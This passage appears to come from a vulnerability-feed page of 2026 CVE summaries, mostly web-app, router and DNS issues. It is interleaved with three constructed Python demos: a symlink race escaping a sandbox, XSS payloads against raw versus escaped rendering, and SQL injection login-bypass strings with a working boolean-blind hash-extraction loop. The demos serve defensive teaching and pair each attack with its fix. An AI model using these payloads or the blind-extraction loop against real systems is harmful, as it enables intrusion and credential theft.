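    path string. Every later operation re-resolves the path, so if the
    validated parent is swapped for a symlink in between, the write follows
    the new alias."""
    target = validate_under(sandbox, rel)
    parent = os.path.dirname(target)
    if race_hook:
        race_hook()  # stands in for the attacker winning the race
    tmp = os.path.join(parent, ".staged.tmp")
    with open(tmp, "wb") as fh:
        fh.write(data)
    os.rename(tmp, target)
    return target


def open_dir_chain(sandbox: str, rel_dir: str) -> int:
    """Walk from the sandbox root one component at a time with O_NOFOLLOW,
    so no symlink on the way can redirect us; returns a directory fd that
    stays bound to the directory that was actually verified."""
    fd = os.open(sandbox, os.O_RDONLY | os.O_DIRECTORY)
    try:
        for part in rel_dir.split("/"):
            if part in ("", "."):
                continue
            if part == "..":
                raise PermissionError("parent traversal not allowed")
            nfd = os.open(part, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW, dir_fd=fd)
            os.close(fd)
            fd = nfd
    except BaseException:
        os.close(fd)
        raise
    return fd


def commit_write_anchored(sandbox: str, rel: str, data: bytes, race_hook=None) -> None:
    """Hardened pattern: hold an fd to the verified parent and do the stage,
    write and commit relative to that fd (openat/renameat semantics)."""
    rel_dir, name = os.path.split(rel)
    if not name or name in (".", ".."):
        raise ValueError("bad file name")
    dfd = open_dir_chain(sandbox, rel_dir)
    try:
        if race_hook:
            race_hook()  # attacker swaps the path alias; dfd does not care
        tmp = ".staged." + name
        fd = os.open(tmp, os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW,
                     0o600, dir_fd=dfd)
        with os.fdopen(fd, "wb") as fh:
            fh.write(data)
        os.rename(tmp, name, src_dir_fd=dfd, dst_dir_fd=dfd)
    finally:
        os.close(dfd)


def demo() -> dict:
    """Constructed layout: sandbox/uploads is validated, then the attacker
    renames it away and drops a symlink to an outside directory in its place."""
    base = tempfile.mkdtemp()
    try:
        sandbox = os.path.join(base, "sandbox")
        outside = os.path.join(base, "outside")
        parent = os.path.join(sandbox, "uploads")
        os.makedirs(parent)
        os.makedirs(outside)

        def swap_alias():
            os.rename(parent, parent + ".bak")
            os.symlink(outside, parent)

        def reset():
            os.remove(parent)  # the symlink
            os.rename(parent + ".bak", parent)

        commit_write_vulnerable(sandbox, "uploads/a.txt", b"x", race_hook=swap_alias)
        vuln_escaped = os.path.isfile(os.path.join(outside, "a.txt"))
        reset()
        commit_write_anchored(sandbox, "uploads/b.txt", b"y", race_hook=swap_alias)
        anchored_escaped = os.path.isfile(os.path.join(outside, "b.txt"))
        anchored_inside = os.path.isfile(os.path.join(parent + ".bak", "b.txt"))
        return {"vulnerable_escaped": vuln_escaped,
                "anchored_escaped": anchored_escaped,
                "anchored_stayed_inside": anchored_inside}
    finally:
        shutil.rmtree(base)
```

The anchored version still writes into the directory that was verified even after it has been renamed, because the descriptor refers to the inode, not the name; the string-based version lands the file in the outside directory. The same idea applies to any stage-then-commit sequence: validate once, keep the handle, and never re-resolve the path.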
-
CVE-2026-32951
MEDIUM
CVSS 4.3
Discourse versions 2026.1.0 through 2026.1.2, 2026.2.0 through 2026.2.1, and pre-release builds of 2026.3.0 allow authenticated users to disclose shared draft topic titles via specially crafted inline onebox requests that reference the shared drafts category. An attacker with valid Discourse credentials can enumerate and read draft titles not intended for their access, violating information confidentiality. The vulnerability has been patched in versions 2026.1.3, 2026.2.2, and 2026.3.0; EPSS and KEV data indicate no current active exploitation, but the fix should be deployed promptly given the low barrier to exploitation.
Information Disclosure
-
CVE-2026-32921
MEDIUM
CVSS 5.3
OpenClaw before 2026.3.8 allows authenticated remote attackers to bypass approval controls in the system.run function by obtaining approval for a script, modifying the approved script file before execution, and executing malicious content while preserving the approved command structure. This approval-execution window vulnerability enables privilege escalation and code execution with low complexity and no user interaction required. No public exploit code or active exploitation has been confirmed at the time of analysis.
Authentication Bypass
-
CVE-2026-32629
MEDIUM
CVSS 5.4
Stored cross-site scripting (XSS) in phpMyFAQ 4.2.0-alpha allows unauthenticated attackers to inject malicious JavaScript via RFC 5321-compliant quoted email addresses in guest FAQ submissions. The injected payload is stored without sanitization and rendered using Twig's |raw filter in the admin FAQ editor, executing in administrator browsers and enabling session hijacking, admin account takeover, and arbitrary site manipulation. A publicly available proof-of-concept demonstrates successful JavaScript execution when administrators review pending FAQs.
PHP
RCE
Nginx
Docker
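As an added example covering both the Captcha Protect destination parameter (CVE-2026-34206) and the phpMyFAQ quoted-email case (CVE-2026-32629), not either project's code: a simplified RFC 5321 validator that accepts a quoted local part carrying markup, and the same two values rendered without escaping versus with HTML-context escaping. The page fragments, the payloads and the regex are constructed for the example.

```python
import html
import re

# Simplified RFC 5321 addr-spec: a dot-atom or a quoted-string local part
# at a domain. Constructed for this example to mirror what a standards-aware
# validator accepts; it says nothing about whether the value is safe to render.
_ATEXT = r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+"
_DOT_ATOM = rf"{_ATEXT}(?:\.{_ATEXT})*"
_QUOTED = r'"(?:[^"\\\r\n]|\\.)*"'
_DOMAIN = r"(?:[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?\.)+[A-Za-z]{2,}"
EMAIL_RE = re.compile(rf"(?:{_DOT_ATOM}|{_QUOTED})@{_DOMAIN}")


def is_valid_email(addr: str) -> bool:
    return EMAIL_RE.fullmatch(addr) is not None


def render_raw(template: str, **values) -> str:
    """Mimics text/template (no contextual escaping) or Twig's |raw filter:
    the value is spliced into the markup exactly as supplied."""
    return template.format(**values)


def render_escaped(template: str, **values) -> str:
    """HTML-context escaping at output time. quote=True also encodes " and '
    so a value cannot terminate the attribute it is placed in."""
    return template.format(**{k: html.escape(str(v), quote=True) for k, v in values.items()})


# Constructed page fragments standing in for the challenge page's link and
# the admin editor's author field (not the real projects' markup).
CHALLENGE_LINK = '<a href="{destination}">Continue</a>'
EDITOR_FIELD = '<input name="author_email" value="{email}">'

# Constructed payloads: the first closes the href attribute and opens a
# script tag; the second is a quoted local part that is valid per RFC 5321.
DESTINATION_PAYLOAD = '"><script>alert(document.domain)</script><a x="'
EMAIL_PAYLOAD = '"<img src=x onerror=alert(1)>"@example.com'


def attack_surface() -> dict:
    """Runs both payloads through both renderers and reports what survives."""
    raw_link = render_raw(CHALLENGE_LINK, destination=DESTINATION_PAYLOAD)
    safe_link = render_escaped(CHALLENGE_LINK, destination=DESTINATION_PAYLOAD)
    raw_field = render_raw(EDITOR_FIELD, email=EMAIL_PAYLOAD)
    safe_field = render_escaped(EDITOR_FIELD, email=EMAIL_PAYLOAD)
    return {
        "email_passes_validation": is_valid_email(EMAIL_PAYLOAD),
        "raw_link_has_script_tag": "<script>" in raw_link,
        "escaped_link_attribute_intact": "<script>" not in safe_link and safe_link.count('"') == 2,
        "raw_field_has_img_tag": "<img " in raw_field,
        "escaped_field_inert": "<" not in safe_field.replace("<input", "", 1),
    }
```

Input validation is the wrong layer for this: the email payload is a legal address, so the only fix that holds is escaping for the context at output time. For the href case, escaping stops attribute breakout but does not make a javascript: URL safe, so the destination also needs a same-origin or relative-path check before it is rendered.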
-
CVE-2026-32620
MEDIUM
CVSS 5.3
Discourse versions 2026.1.0 through 2026.1.2, 2026.2.0 through 2026.2.1, and pre-release builds of 2026.3.0 leak read receipt metadata (who read staff-only posts and when) to non-staff users who should not have access to that information. While no post content is exposed, the metadata disclosure violates intended access controls. Patches are available in versions 2026.1.3, 2026.2.2, and 2026.3.0.
Information Disclosure
-
CVE-2026-32619
MEDIUM
CVSS 6.3
Discourse versions 2026.1.0 through 2026.1.2, 2026.2.0 through 2026.2.1, and 2026.3.0-beta retain unauthorized poll interaction capabilities for users who have lost access to private topics, allowing them to vote on and toggle poll status despite removal from category group membership. While no topic content is exposed, the vulnerability permits state modification in topics to which access should have been revoked, violating the intended access control model. Patched versions 2026.1.3, 2026.2.2, and 2026.3.0 are available, and no public exploit code has been identified.
Authentication Bypass
-
CVE-2026-32618
MEDIUM
CVSS 4.3
Discourse chat user search functionality discloses channel membership information to authenticated users without proper authorization checks, allowing users to infer private channel membership across versions 2026.1.0-2026.1.2, 2026.2.0-2026.2.1, and 2026.3.0-rc1, affecting community administrators and organizations relying on channel privacy. The vulnerability requires authenticated access but carries low confidentiality impact (CVSS 4.3); patches are available in versions 2026.1.3, 2026.2.2, and 2026.3.0.
Information Disclosure
-
CVE-2026-32615
MEDIUM
CVSS 5.3
Category group moderators in Discourse versions 2026.1.0-2026.1.2, 2026.2.0-2026.2.1, and 2026.3.0-pre can perform privileged actions (such as topic moderation) on content within private categories to which they lack read access, bypassing intended access controls. This authenticated privilege escalation affects self-hosted and managed Discourse instances and has been resolved in versions 2026.1.3, 2026.2.2, and 2026.3.0+. No public exploit code or active exploitation has been reported at this time.
Authentication Bypass
-
CVE-2026-32273
MEDIUM
CVSS 5.4
Stored cross-site scripting (XSS) in Discourse category description API endpoints allows authenticated users with category management privileges to inject malicious scripts that execute in the browsers of other users viewing the category. The vulnerability affects Discourse versions 2026.1.0 through 2026.1.2, 2026.2.0 through 2026.2.1, and 2026.3.0-pre-release due to missing input sanitization on category description updates. Vendor-released patches address this in versions 2026.1.3, 2026.2.2, and 2026.3.0; no public exploit code has been identified at time of analysis.
XSS
-
CVE-2026-32243
MEDIUM
CVSS 5.3
Stored cross-site scripting (XSS) in Discourse allows authenticated users with conversation creation privileges to inject arbitrary HTML and JavaScript via crafted AI conversation titles, executing malicious payloads in the browsers of users viewing onebox previews and potentially enabling session hijacking or unauthorized actions. Affects Discourse versions 2026.1.0 through 2026.1.2, 2026.2.0 through 2026.2.1, and 2026.3.0-beta; patched versions 2026.1.3, 2026.2.2, and 2026.3.0 are available. No public exploit code or active exploitation has been confirmed at time of analysis.
XSS
-
CVE-2026-32143
MEDIUM
CVSS 5.3
Discourse moderators can export CSV data from admin-restricted reports in versions 2026.1.0-2026.1.2, 2026.2.0-2026.2.1, and 2026.3.0-beta, circumventing role-based access controls and exposing sensitive operational data intended exclusively for administrators. The vulnerability requires authenticated moderator access but carries low confidentiality impact (CVSS 5.3). Vendor-released patches are available in Discourse 2026.1.3, 2026.2.2, and 2026.3.0.
Information Disclosure
-
CVE-2026-32113
MEDIUM
CVSS 5.1
Open redirect vulnerability in Discourse versions 2026.1.0 through 2026.1.2, 2026.2.0 through 2026.2.1, and pre-release builds of 2026.3.0 allows unauthenticated remote attackers to redirect users to arbitrary destinations via a malicious sso_destination_url cookie, because the StaticController enter action does not validate the URL it reads back from that cookie. The cookie is normally set during legitimate DiscourseConnect Provider flows, where the destination is cryptographically validated, but the enter action trusts the cookie value itself, so an attacker who can place a cookie for the Discourse origin in a victim's browser can supply any destination. Exploitation requires user interaction (visiting a crafted link) and the attacker-controlled cookie persisting until that visit, but a successful redirect can be used for credential harvesting or phishing. No public exploit code or active exploitation has been confirmed at time of analysis. Patched versions 2026.1.3, 2026.2.2, and 2026.3.0 are available.
Open Redirect
-
CVE-2026-30879
MEDIUM
CVSS 6.9
Cross-site scripting (XSS) vulnerability in baserCMS prior to version 5.2.3 allows attackers to inject malicious scripts into blog posts, potentially enabling session hijacking, credential theft, or malware distribution to site visitors. The vulnerability affects the blog post functionality and has been patched in version 5.2.3; no public exploit code or active exploitation has been confirmed at time of analysis.
XSS
-
CVE-2026-30878
MEDIUM
CVSS 5.3
baserCMS versions prior to 5.2.3 allow unauthenticated remote attackers to bypass administrative form submission controls via a public mail API, enabling arbitrary form submissions even when the form is configured to reject new entries. This authentication bypass has a CVSS score of 5.3 and permits attackers to inject spam or abuse content without authorization, circumventing intended intake restrictions. Vendor-released patch available in version 5.2.3.
Authentication Bypass
-
CVE-2026-30521
MEDIUM
CVSS 6.5
SourceCodester Loan Management System v1.0 allows authenticated administrators to create loan plans with negative interest rates by submitting negative values in HTTP POST requests, bypassing client-side validation that lacks server-side enforcement. This business logic vulnerability enables attackers with administrative credentials to manipulate loan terms and potentially cause financial harm to the organization. Publicly available exploit code exists demonstrating the attack.
Authentication Bypass
-
CVE-2026-30520
MEDIUM
CVSS 5.4
Blind SQL injection in SourceCodester Loan Management System v1.0 allows authenticated attackers to inject malicious SQL via the borrower_id parameter in the ajax.php save_loan action. Exploitation requires valid credentials, and a publicly available proof-of-concept exists, making this a moderate-risk issue (CVSS 5.4) for organizations using this open-source application.
SQLi
PHP
-
CVE-2026-30280
MEDIUM
CVSS 5.3
Arbitrary file overwrite vulnerability in RAREPROB SOLUTIONS PRIVATE LIMITED Video player Play All Videos v1.0.135 enables remote attackers to overwrite critical internal files during the file import process, resulting in arbitrary code execution or information disclosure. Beyond the CVSS 5.3 listed here, no exploitation data or vendor patch information is currently available; the vulnerability was disclosed via academic research channels rather than coordinated vendor notification.
File Upload
RCE
Information Disclosure
-
CVE-2026-27854
MEDIUM
CVSS 4.8
DNSdist instances using custom Lua code can be crashed via denial of service when the DNSQuestion:getEDNSOptions method accesses a modified DNS packet, triggering a use-after-free condition. This affects DNSdist across all versions and requires network access to send crafted DNS queries, but the attack demands specific Lua code patterns and high attack complexity; no public exploit or active exploitation has been confirmed, and the real-world impact is limited to environments where custom Lua DNS query handlers reference EDNS options.
Use After Free
Denial Of Service
Memory Corruption
-
CVE-2026-27853
MEDIUM
CVSS 5.9
DNSdist fails to validate packet size bounds when rewriting DNS questions or responses via Lua methods (DNSQuestion:changeName, DNSResponse:changeName), allowing unauthenticated remote attackers to craft DNS responses that trigger out-of-bounds writes and exceed the 65535-byte DNS packet size limit, resulting in denial of service via crash. CVSS 5.9 (high availability impact); no public exploit code identified at time of analysis.
Buffer Overflow
Denial Of Service
Memory Corruption
-
CVE-2026-27697
MEDIUM
CVSS 6.9
SQL injection in baserCMS prior to version 5.2.3 allows unauthenticated remote attackers to execute arbitrary SQL queries through unvalidated input in blog post functionality. The vulnerability affects all versions before 5.2.3 and has been patched; no public exploit code or active exploitation has been confirmed at the time of analysis.
SQLi
-
CVE-2026-24153
MEDIUM
CVSS 5.2
Information disclosure in NVIDIA Jetson Linux affects Xavier, Orin, and Thor series devices because the nvluks trusted application remains enabled in the initrd. A local attacker with physical access and low-level privileges can exploit this to read sensitive data from the device; the issue is classified as CWE-501 (Trust Boundary Violation). CVSS 5.2 reflects the high confidentiality impact offset by the physical attack vector and the need for authenticated access; no public exploit or CISA KEV status reported.
Information Disclosure
Nvidia
-
CVE-2026-24030
MEDIUM
CVSS 5.3
Memory exhaustion in DNSdist allows remote, unauthenticated attackers to trigger denial of service by crafting malicious DNS over QUIC or DNS over HTTP/3 payloads that force excessive memory allocation. The attack causes the QUIC connection to close abnormally, and in systems with limited memory reserves, can force out-of-memory conditions that terminate the DNSdist process entirely.
Denial Of Service
-
CVE-2026-24029
MEDIUM
CVSS 6.5
PowerDNS dnsdist allows unauthenticated DNS over HTTPS (DoH) queries to bypass access control lists when the early_acl_drop option is disabled on nghttp2 frontends, exposing the DNS resolver to unauthorized query submission and potential information disclosure. Affected versions include dnsdist across multiple releases where this configuration weakness exists; the vulnerability has a CVSS score of 6.5 and exposes both confidentiality and integrity concerns despite not affecting availability.
Authentication Bypass
-
CVE-2026-24028
MEDIUM
CVSS 5.3
Out-of-bounds read in PowerDNS dnsdist allows unauthenticated remote attackers to trigger denial of service or potential information disclosure by sending a crafted DNS response packet when custom Lua code uses the newDNSPacketOverlay function to parse packets. CVSS 5.3 indicates moderate severity with network-accessible attack surface and no privilege or user interaction required.
Denial Of Service
Information Disclosure
Buffer Overflow
-
CVE-2026-22569
MEDIUM
CVSS 5.4
Zscaler Client Connector on Windows contains an incorrect startup configuration that permits limited traffic to bypass inspection under rare circumstances, resulting in potential information disclosure and integrity compromise. The vulnerability affects all versions of the product and requires user interaction to exploit, with a CVSS score of 5.4 reflecting the combination of network-based attack vector, low complexity, and low impact on confidentiality and integrity. No evidence of active exploitation or public exploit code has been identified.
Information Disclosure
Microsoft
-
CVE-2026-22561
MEDIUM
CVSS 4.7
DLL search-order hijacking in Anthropic Claude for Windows installer (Claude Setup.exe) versions before 1.1.3363 enables local privilege escalation to system context. An attacker with low privileges and physical or local access can plant a malicious DLL (such as profapi.dll) in the installer directory; when an elevated user runs the installer, the uncontrolled search path causes the malicious DLL to be loaded and executed with system privileges, achieving arbitrary code execution. No public exploit code or active exploitation has been confirmed at the time of analysis.
Privilege Escalation
RCE
Microsoft
-
CVE-2026-5237
MEDIUM
CVSS 6.9
SQL injection in itsourcecode Payroll Management System 1.0 allows remote unauthenticated attackers to manipulate the ID parameter in /manage_user.php, enabling arbitrary SQL query execution with confidentiality and integrity impact. The vulnerability has a publicly available exploit, making it immediately actionable for threat actors despite the moderate CVSS score.
SQLi
PHP
-
CVE-2026-5236
MEDIUM
CVSS 4.8
Heap-based buffer overflow in Axiomatic Bento4 up to version 1.6.0-641 allows local authenticated attackers to cause a denial of service or potentially corrupt memory via the AP4_BitReader::SkipBits function in the DSI v1 Parser component when processing a maliciously crafted n_presentations argument. Public exploit code is available; vendor has not responded to early disclosure.
Buffer Overflow
-
CVE-2026-5235
MEDIUM
CVSS 4.8
Heap-based buffer overflow in Axiomatic Bento4 up to version 1.6.0-641 affects the AP4_BitReader::ReadCache function in the MP4 file parser component, allowing local attackers with limited privileges to cause information disclosure, integrity violation, and denial of service. Publicly available exploit code exists, and the vendor has not yet responded to the early disclosure despite project notification through GitHub issue tracking.
Heap Overflow
Buffer Overflow
-
CVE-2026-5215
MEDIUM
CVSS 5.3
Improper access controls in D-Link DNS and DNR network-attached storage devices allow unauthenticated attackers on an adjacent network to reach IPv6 configuration functions via the cgi_get_ipv6 function in /cgi-bin/network_mgr.cgi, potentially disclosing sensitive network configuration information. The vulnerability affects multiple D-Link models up to firmware version 20260205, publicly available exploit code exists, and the attack requires only network adjacency with low complexity.
D-Link
Authentication Bypass
-
CVE-2026-5210
MEDIUM
CVSS 6.9
Remote file inclusion in SourceCodester Leave Application System 1.0 allows unauthenticated attackers to manipulate the page parameter and access arbitrary files, resulting in information disclosure. The CVSS 4.0 score of 6.9 reflects low confidentiality impact with network-based attack vector and no user interaction required. Publicly available exploit code exists, increasing practical risk despite the moderate CVSS rating.
Information Disclosure
-
CVE-2026-5209
MEDIUM
CVSS 4.8
Stored cross-site scripting (XSS) in SourceCodester Leave Application System 1.0 User Management Handler allows authenticated remote attackers with high privileges to inject malicious scripts via the component, requiring user interaction to execute. The vulnerability carries a CVSS 4.8 score with publicly available exploit code; however, real-world risk is constrained by high privilege requirement (PR:H) and necessary user interaction (UI:P), limiting opportunistic exploitation.
XSS
-
CVE-2026-5206
MEDIUM
CVSS 5.3
SQL injection in code-projects Simple Gym Management System 1.0 Payment Handler allows authenticated remote attackers to manipulate Payment_id, Amount, customer_id, payment_type, and customer_name parameters to execute arbitrary SQL queries, potentially leading to unauthorized data access or modification. Publicly available exploit code exists for this vulnerability; patch status from vendor remains unconfirmed.
SQLi
-
CVE-2026-5205
MEDIUM
CVSS 5.3
Server-side request forgery (SSRF) in Chatwoot up to version 4.11.2 allows authenticated remote attackers to manipulate the URL argument in the Webhooks::Trigger function, enabling arbitrary HTTP requests from the server. Publicly available exploit code exists, and the vendor has not responded to disclosure efforts. While CVSS is moderate (5.3), the presence of public POC and authenticated attack vector creates a meaningful exploitation risk for deployed instances.
SSRF
-
CVE-2026-5203
MEDIUM
CVSS 5.1
Path traversal in CMS Made Simple UserGuide Module XML Import functionality allows authenticated high-privilege attackers to manipulate file operations in the _copyFilesToFolder function, enabling arbitrary file placement on the server with limited confidentiality and integrity impact. The vulnerability affects CMS Made Simple up to version 2.2.22, requires high-level privileges to exploit remotely, and vendor has confirmed a fix for a future release; publicly available exploit code exists but real-world risk remains moderate due to privilege requirements.
PHP
Path Traversal
-
CVE-2026-5198
MEDIUM
CVSS 6.9
SQL injection in code-projects Student Membership System 1.0 admin login allows unauthenticated remote attackers to bypass authentication and access sensitive data via crafted username/password parameters at /admin/index.php. Publicly available exploit code exists (VulDB 354296, GitHub POC), enabling trivial exploitation with no attack complexity. The score (CVSS 3.1: 7.3; CVSS 4.0: 6.9) reflects a network-accessible attack with low confidentiality, integrity and availability impact. No vendor-released patch identified at time of analysis.
SQLi
PHP
-
CVE-2026-5197
MEDIUM
CVSS 5.3
SQL injection in code-projects Student Membership System 1.0 allows authenticated remote attackers to execute arbitrary SQL queries via the ID parameter in /delete_user.php, enabling unauthorized data exfiltration or manipulation. The vulnerability has CVSS score 5.3 (medium severity) with publicly available exploit code, though it requires authenticated access (PR:L) and carries low confidentiality, integrity, and availability impact per CVSS v4.0 assessment.
PHP
SQLi
-
CVE-2026-5196
MEDIUM
CVSS 5.3
SQL injection in code-projects Student Membership System 1.0 allows authenticated remote attackers to execute arbitrary SQL commands via the ID parameter in /delete_member.php, resulting in limited confidentiality and integrity impact. Publicly available exploit code exists, and the vulnerability has been disclosed; however, active exploitation has not been confirmed by CISA. The attack requires valid authentication credentials but can be initiated over the network with minimal complexity.
PHP
SQLi
-
CVE-2026-5195
MEDIUM
CVSS 6.9
SQL injection in code-projects Student Membership System 1.0 allows unauthenticated remote attackers to extract, modify, or delete database contents via the User Registration Handler component. The score (CVSS 3.1: 7.3; CVSS 4.0: 6.9) reflects a network-based attack with low complexity, requiring no privileges or user interaction. EPSS data not available; the CVE is not in the CISA KEV catalog, so active exploitation is unconfirmed. Publicly available exploit code exists per researcher disclosure on GitHub, elevating real-world risk for organizations running this application.
SQLi
-
CVE-2026-5186
MEDIUM
CVSS 4.8
Double free vulnerability in Nothings stb library (up to version 2.30) in the multi-frame GIF file handler function stbi__load_gif_main allows local authenticated attackers to cause information disclosure and memory corruption. Public exploit code is available. The vendor did not respond to early disclosure notification, leaving affected users without an official patch.
Information Disclosure
-
CVE-2026-5185
MEDIUM
CVSS 4.8
Heap-based buffer overflow in Nothings stb_image library up to version 2.30 in the stbi__gif_load_next function allows local authenticated attackers to cause memory corruption with limited confidentiality, integrity, and availability impact. Public exploit code is available; however, the vulnerability requires local access and authenticated privilege level, significantly limiting real-world exploitation scope. The vendor has not responded to early disclosure attempts.
Heap Overflow
Buffer Overflow
-
CVE-2026-5184
MEDIUM
CVSS 5.3
Remote command injection in TRENDnet TEW-713RE firmware up to version 1.02 allows authenticated remote attackers to execute arbitrary commands via the admuser parameter in the /goform/setSysAdm endpoint. Publicly available exploit code exists, and the vendor has not responded to early disclosure attempts, leaving all affected devices without a vendor-released patch.
Command Injection
-
CVE-2026-5183
MEDIUM
CVSS 5.3
Command injection in TRENDnet TEW-713RE firmware up to version 1.02 allows authenticated remote attackers to execute arbitrary commands via manipulation of the dest parameter in the /goform/addRouting function. Publicly available exploit code exists (CVSS 3.1: 6.3; CVSS 4.0: 5.3); the vendor has not responded to early disclosure attempts, leaving affected devices without an official patch.
Command Injection
-
CVE-2026-5182
MEDIUM
CVSS 6.9
SQL injection in SourceCodester Teacher Record System 1.0 allows unauthenticated remote attackers to execute arbitrary SQL commands via the 'searchteacher' parameter in the Parameter Handler component. A public exploit is available (GitHub POC published), enabling extraction of sensitive data, modification of database records, or potential system compromise. The score (CVSS 3.1: 7.3, High; CVSS 4.0: 6.9, Medium), together with low attack complexity and no authentication required, indicates significant exploitation risk.
SQLi
-
CVE-2026-5181
MEDIUM
CVSS 5.3
Unrestricted file upload in SourceCodester Simple Doctors Appointment System up to version 1.0 allows authenticated remote attackers to upload arbitrary files via the img parameter in /doctors_appointment/admin/ajax.php?action=save_category, potentially leading to remote code execution. The vulnerability has publicly available exploit code and carries a CVSS score of 5.3 with limited impact scope, though it requires valid login credentials to exploit.
PHP
File Upload
-
CVE-2026-5180
MEDIUM
CVSS 6.9
SQL injection in SourceCodester Simple Doctors Appointment System 1.0 allows unauthenticated remote attackers to compromise confidentiality, integrity, and availability via the /admin/ajax.php login endpoint by manipulating the 'email' parameter to execute arbitrary SQL commands. Publicly available exploit code exists (GitHub POC published), significantly lowering the attack barrier. The score (CVSS 3.1: 7.3; CVSS 4.0: 6.9) reflects network-based exploitation requiring low complexity and no privileges, with partial impact across all three CIA properties. No CISA KEV listing at time of analysis, but the combination of a public exploit and authentication bypass capability makes this a realistic threat to internet-facing instances.
SQLi
PHP
-
CVE-2026-5179
MEDIUM
CVSS 6.9
SQL injection in SourceCodester Simple Doctors Appointment System 1.0 allows remote unauthenticated attackers to extract, modify, or delete database contents via the Username parameter in /admin/login.php. Publicly available exploit code exists (GitHub POC), enabling trivial exploitation with no authentication required. The score (CVSS 3.1: 7.3; CVSS 4.0: 6.9) reflects low attack complexity and network accessibility. EPSS data unavailable, but the public POC significantly elevates real-world risk for internet-facing installations.
PHP
SQLi
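As an added example for the login-endpoint SQL injections above (CVE-2026-5198, CVE-2026-5180, CVE-2026-5179) and the blind variant in CVE-2026-30520, not the vendors' code: the concatenated query these applications typically build, the parameterised replacement, and a boolean-based blind extraction that recovers the stored hash through nothing but the login's yes/no answer. The schema, credentials and payloads are constructed; SQLite stands in for MySQL.

```python
import hashlib
import sqlite3

# Constructed sample credentials and schema; not the real applications'.
ADMIN_PASSWORD = "S3cret!"
ADMIN_HASH = hashlib.sha256(ADMIN_PASSWORD.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin (username, password) VALUES (?, ?)", ("admin", ADMIN_HASH))
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, password: str):
    """The pattern behind these CVEs: user input concatenated into the query.
    Hashing the password first does not help; the username is still raw."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    sql = (f"SELECT id, username FROM admin "
           f"WHERE username = '{username}' AND password = '{pw_hash}'")
    return conn.execute(sql).fetchone()


def login_safe(conn, username: str, password: str):
    """Parameterised query: the driver sends values separately from the SQL
    text, so quote characters in `username` are data, never syntax."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    return conn.execute(
        "SELECT id, username FROM admin WHERE username = ? AND password = ?",
        (username, pw_hash),
    ).fetchone()


# Two classic bypass payloads. The trailing space after `--` matters on
# MySQL, which is what the affected PHP apps typically run; SQLite is lenient.
BYPASS_COMMENT = "admin' -- "
BYPASS_TAUTOLOGY = "' OR 1=1 -- "


def extract_hash_blind(conn, length: int = 64) -> str:
    """Boolean-based blind extraction using only the login's yes/no answer:
    one character of the stored hash per (up to) 16 requests. This is the
    same oracle a blind injection on a save/delete endpoint exposes."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in "0123456789abcdef":
            probe = (f"' OR (SELECT substr(password,{pos},1) FROM admin "
                     f"WHERE username='admin')='{ch}' -- ")
            if login_vulnerable(conn, probe, "irrelevant") is not None:
                recovered += ch
                break
        else:
            raise RuntimeError(f"no character matched at position {pos}")
    return recovered
```

The comment payload logs in as admin with any password, and the blind loop recovers the full 64-character hash in at most 1024 requests, which is why "blind" and "authenticated" in these entries do not mean low impact. Against `login_safe` both payloads are just unusual usernames that match no row.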
-
CVE-2026-5178
MEDIUM
CVSS 5.3
Command injection in Totolink A3300R firmware 17.0.0cu.557_b20221024 allows authenticated remote attackers to execute arbitrary commands via the vlanPriLan3 parameter in the setIptvCfg function of /cgi-bin/cstecgi.cgi. A public exploit is available and the entry carries an exploitability flag (EPSS P/E indicator); the score is moderate (CVSS 3.1: 6.3; CVSS 4.0: 5.3). Because the parameter reaches a shell, a successful request does not merely alter VLAN priority settings but runs attacker-chosen OS commands on the router.
Command Injection
-
CVE-2026-5177
MEDIUM
CVSS 5.3
Command injection in Totolink A3300R 17.0.0cu.557_b20221024 allows authenticated remote attackers to execute arbitrary commands via manipulation of the rxRate parameter in the setWiFiBasicCfg function at /cgi-bin/cstecgi.cgi. Publicly available exploit code exists (CVSS 3.1: 6.3; CVSS 4.0: 5.3), making it a moderate-priority issue for affected device administrators despite requiring prior authentication.
Command Injection
-
CVE-2026-5176
MEDIUM
CVSS 6.9
Command injection in Totolink A3300R router firmware 17.0.0cu.557_b20221024 allows unauthenticated remote attackers to execute arbitrary system commands via the setSyslogCfg function in /cgi-bin/cstecgi.cgi. Public exploit code is available on GitHub, significantly lowering the barrier to exploitation. The CVSS vector (AV:N/AC:L/PR:N) confirms network-accessible exploitation with low complexity and no authentication required, enabling pre-authentication remote code execution on affected routers.
Command Injection
-
CVE-2026-4819
MEDIUM
CVSS 4.9
Search Guard FLX versions 1.0.0 through 4.0.1 write user credentials into audit logs when users authenticate through Kibana, exposing plaintext authentication material to any administrator or user with log access. The vulnerability requires high-privilege access to exploit and affects only confidentiality, but credentials that land in audit logs are copied along into backup and archival systems, so the disclosure outlives the original log.
Information Disclosure
Elastic
-
CVE-2026-4818
MEDIUM
CVSS 6.8
Search Guard FLX versions 3.0.0 through 4.0.1 allow authenticated users with insufficient privileges to execute unauthorized management operations on data streams due to improper access control, enabling privilege escalation with high confidentiality and integrity impact. The CVSS score of 6.8 reflects network accessibility and moderate attack complexity, with active data stream manipulation possible after authentication. No public exploit code or confirmed active exploitation has been identified at this time.
Authentication Bypass
-
CVE-2026-4799
MEDIUM
CVSS 4.3
Open redirect in Search Guard FLX up to version 4.0.1 allows unauthenticated remote attackers to craft malicious requests that redirect users to untrusted URLs, enabling phishing and credential theft attacks. The vulnerability requires user interaction (clicking a redirected link) and affects all versions through 4.0.1. No public exploit code or active exploitation has been confirmed at time of analysis.
Open Redirect
-
CVE-2026-4146
MEDIUM
CVSS 6.1
Reflected Cross-Site Scripting in Loco Translate WordPress plugin versions up to 2.8.2 allows unauthenticated attackers to inject arbitrary web scripts via the 'update_href' parameter due to insufficient input sanitization and output escaping. The vulnerability requires user interaction (clicking a malicious link) to execute, affecting WordPress sites with the plugin installed. CVSS 6.1 reflects moderate severity with network-accessible attack vector and cross-site scope impact on confidentiality and integrity.
WordPress
XSS
-
CVE-2026-3881
MEDIUM
CVSS 5.8
